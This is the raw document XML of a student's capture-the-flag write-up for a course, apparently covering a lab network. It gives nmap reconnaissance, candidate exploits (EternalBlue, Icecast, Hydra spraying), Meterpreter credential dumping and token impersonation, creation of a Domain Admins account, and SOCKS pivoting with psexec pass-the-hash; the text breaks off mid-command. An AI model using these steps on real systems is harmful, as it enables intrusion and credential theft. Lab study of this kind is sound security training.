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20E259" w14:textId="77777777" w:rsidR="0069083C" w:rsidRPr="002D3CB2" w:rsidRDefault="0069083C" w:rsidP="0069083C">
      <w:r>
        <w:t>Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3CB2">
        <w:t xml:space="preserve"> Sujith Dwarsala</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40982BE6" w14:textId="77777777" w:rsidR="0069083C" w:rsidRDefault="0069083C" w:rsidP="0069083C">
      <w:r w:rsidRPr="002D3CB2">
        <w:t>Class: CSCI 6542</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4991FC93" w14:textId="00BCBA03" w:rsidR="00D707E2" w:rsidRPr="002D3CB2" w:rsidRDefault="00D707E2" w:rsidP="0069083C">
      <w:r>
        <w:t>Group: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8FFE8" w14:textId="0C309205" w:rsidR="0069083C" w:rsidRPr="002D3CB2" w:rsidRDefault="0069083C" w:rsidP="0069083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CTF </w:t>
      </w:r>
      <w:r w:rsidR="00D707E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Final </w:t>
      </w:r>
      <w:r w:rsidR="00E203B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Write-Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE2998" w14:textId="77777777" w:rsidR="0069083C" w:rsidRDefault="0069083C" w:rsidP="0069083C"/>
    <w:p w14:paraId="4DC7415F" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00F57D0F" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57D0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Plan of Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00F57D0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023BE4A" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="005F3B9B" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648027D" w14:textId="77777777" w:rsidR="00426FE3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color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entire Subnet:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C334CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005269DF">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005269DF">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n</w:t>
      </w:r>
      <w:r w:rsidRPr="005269DF">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.91.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921C61B" w14:textId="27B59A5E" w:rsidR="00426FE3" w:rsidRPr="00426FE3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color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Specific Hosts (x5):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E47C6B">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E47C6B">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E47C6B">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E47C6B">
        <w:rPr>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 192.168.91.201 192.168.91.202 192.168.91.203 192.168.91.204 192.168.91.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719D3FAA" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 - </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A04296" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00C50DB6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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Possibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772748A2" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="007A15A3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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A15A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00084620">
        <w:t>.91.20</w:t>
      </w:r>
      <w:r>
        <w:t>1-204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391A6E61" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="002630C0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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A15A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Icecast_header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for .91.201-204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B5BD9" w14:textId="2A2D2BE2" w:rsidR="00426FE3" w:rsidRPr="00426FE3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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra (password spraying) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D23D0D">
        <w:t>for .91.254 (OpenSSH 6.7 protocol 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F850D" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 1 – Internal Foraging and Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB008E1" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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  <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="225192AE" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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  <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E74E91D" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561FD773" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>use incognito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E992F6B" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>list_tokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCF123" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>impersonate_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>user_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BC0AD" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B9B84" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>net config workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A9FBBC" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;domain&gt; (if one exists; to get IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B1A89" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>net share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5DF4D" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> \\&lt;domain DNS&gt;\C$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874452C" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00CF6B46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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>net user &lt;username&gt; &lt;password&gt; /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D11D47" w14:textId="16884B82" w:rsidR="00426FE3" w:rsidRPr="00426FE3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CF6B46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>net group “Domain Admins” &lt;username&gt; /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D129E" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(REQUIRES 2 TERMINALS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA031D6" w14:textId="77777777" w:rsidR="00426FE3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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Commands, post-exploitation </w:t>
      </w:r>
      <w:r w:rsidRPr="00014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(Terminal 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D811BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A48A94" w14:textId="77777777" w:rsidR="00426FE3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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">run autoroute -s 192.168.91.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="00261803">
        <w:t>(run on exploited machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D650D34" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00014A9C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014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B881FE" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00014A9C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014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>use auxiliary/server/socks4a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FE216" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00014A9C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014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>set SRVHOST 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7146A7" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="00014A9C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014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">set SRVPORT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AB03448" w14:textId="77777777" w:rsidR="00426FE3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014A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D29029" w14:textId="77777777" w:rsidR="00426FE3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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D811BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Commands, post-exploitation </w:t>
      </w:r>
      <w:r w:rsidRPr="00D811BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(Terminal 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D811BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF16535" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00604CE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00604CE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00604CE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00604CE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>proxychains.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (127.0.0.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4AD2C" w14:textId="77777777" w:rsidR="00426FE3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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>targetIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&gt; --top-ports 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3441AF" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F712C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Second-Level Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8A21A" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="0016342E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16342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51FF9CE1" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="0016342E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16342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>set RHOST &lt;reconned IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563250FC" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="0016342E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16342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;level 1 hashdump user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359A6F1" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="0016342E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16342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;level 1 hashdump pass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01664BC3" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="0016342E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16342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>set LHOST &lt;level 1 exploited IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47590519" w14:textId="124A607A" w:rsidR="00426FE3" w:rsidRPr="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016342E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
